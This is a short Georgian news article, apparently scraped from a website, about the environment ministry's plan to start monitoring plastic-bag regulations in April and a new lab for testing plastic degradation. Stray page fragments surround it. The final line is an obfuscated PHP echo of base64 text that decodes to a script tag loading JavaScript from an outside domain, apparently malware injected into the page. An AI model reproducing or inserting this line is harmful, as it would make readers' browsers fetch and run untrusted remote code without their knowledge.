tube
ავერსი jaluzi

სახელმწიფო პლასტიკისა და ბიოდეგრადირებადი პარკების რეგულირების წესის შესაბამისობის მონიტორინგს აპრილიდან დაიწყებს. ამის შესახებ ინფორმაციას გარემოს დაცვისა და სოფლის მეურნეობის სამინისტრო ავრცელებს.

კერძოდ, მათი ცნობით გარემოს დაცვისა და სოფლის მეურნეობის მინისტრის მოადგილეებმა სოლომონ პავლიაშვილმა და კახა კაკაბაძემ პლასტიკის პარკების მწარმოებლებთან და იმპორტიორებთან სამუშაო შეხვედრა გამართეს.

ამასთანავე, უწყების განმარტებით, შეხვედრაზე პლასტიკის პარკების წარმოებასა და რეალიზაციასთან დაკავშირებული რეგულაციების აღსრულების და ამ პროცესში ბიზნესსექტორის წარმომადგენლებთან კოორდინირებული თანამშრომლობის მნიშვნელობის საკითხები განიხილეს.

ამასთან, სამინისტროს ინფორმაციით, საქართველოში პლასტიკის დეგრადაციის ხარისხის და პლასტიკის მასალებში მეტალების განმსაზღვრელი კვლევების ჩატარება უკვე შესაძლებელია. სახელმწიფოს მხარდაჭერით, მოეწყო თანამედროვე სტანდარტების ლაბორატორია, სადაც კვლევები აკრედიტებული მეთოდებით ხორციელდება.

86
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");